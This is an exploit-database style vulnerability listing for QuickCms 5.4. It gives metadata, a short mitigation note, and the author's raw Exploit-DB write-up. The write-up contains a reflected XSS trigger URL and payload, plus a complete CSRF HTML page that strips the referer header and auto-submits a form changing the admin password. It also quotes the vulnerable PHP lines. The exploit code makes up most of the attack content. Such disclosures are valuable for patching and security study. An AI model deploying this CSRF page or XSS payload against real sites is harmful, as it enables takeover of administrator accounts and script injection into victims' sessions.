QuickCms 5.4 Multiple Vulnerabilites

vendor:

Quick.Cms

by:

shpendk

8,8

CVSS

HIGH

Reflected XSS and CSRF

79 (XSS) and 352 (CSRF)

CWE

Product Name: Quick.Cms

Affected Version From: 5.4

Affected Version To: 5.4

Patch Exists: NO

Related CWE: N/A

CPE: a:opensolution:quick.cms:5.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Xampp on Windows

2014

QuickCms 5.4 Multiple Vulnerabilites

The Reflected XSS vulnerability exists in the Admin Area of QuickCms 5.4. The vulnerable code is present in the /quickcms/templates/admin/pages-form.php file. The CSRF vulnerability exists due to the lack of referer header check in the /quickcms/admin.php file. This can be bypassed using information from a website.

Mitigation:

The XSS vulnerability can be mitigated by properly sanitizing user input. The CSRF vulnerability can be mitigated by properly checking for the referer header.

Source

Exploit-DB raw data:

# Exploit Title: QuickCms 5.4 Multiple Vulnerabilites
# Date: 04/08/2014
# Author: shpendk
# Software Link: http://opensolution.org/download,en,18.html?sFile=Quick.Cms/Quick.Cms_v5.4.zip
# Version: 5.4
# Tested on: Xampp on Windows



Reflected XSS Vulnerability in Admin Area:

Trigger: http://localhost/quickcms/admin.php/123';alert(123);//abc?p=pages-form&iPage=14


Vulnerable code: in /quickcms/templates/admin/pages-form.php:

144:			 <script type="text/javascript">
145:                   var sPhpSelf = '<?php echo $_SERVER['PHP_SELF']; ?>';...

poc: anything';alert(123);//




Admin password change csrf:

<html>
<head>
<script>
function load() {
    var postdata = '<form id=dynForm method=POST action=\'http://localhost/admin.php?p=tools-config\'>' +
                    '<input type=hidden name=sOption value=save login=admin />' +
                    '<input type=hidden name=pass value=admin1234 />' +
                    '</form>';
    top.frames[0].document.body.innerHTML=postdata;
    top.frames[0].document.getElementById('dynForm').submit();
}
</script>
</head>
<body onload="load()">

<iframe src="about:blank" id="noreferer"></iframe>


</body>
</html>


Vulnerable code:
60:	if( ( strstr( $p, '-delete' ) || count( $_POST ) > 0 ) && !empty( $_SERVER['HTTP_REFERER'] ) && !strstr( $_SERVER['HTTP_REFERER'], $_SERVER['SCRIPT_NAME'] ) ){
61:  header( 'Location: '.$_SERVER['PHP_SELF'].'?p=error' );
62:  exit;
}

Explanation:

The above code checks for the presence for a referer header, if there is no referer present the POST works fine. This is trivially bypassed using information from here:
http://webstersprodigy.net/2013/02/01/stripping-the-referer-in-a-cross-domain-post-request/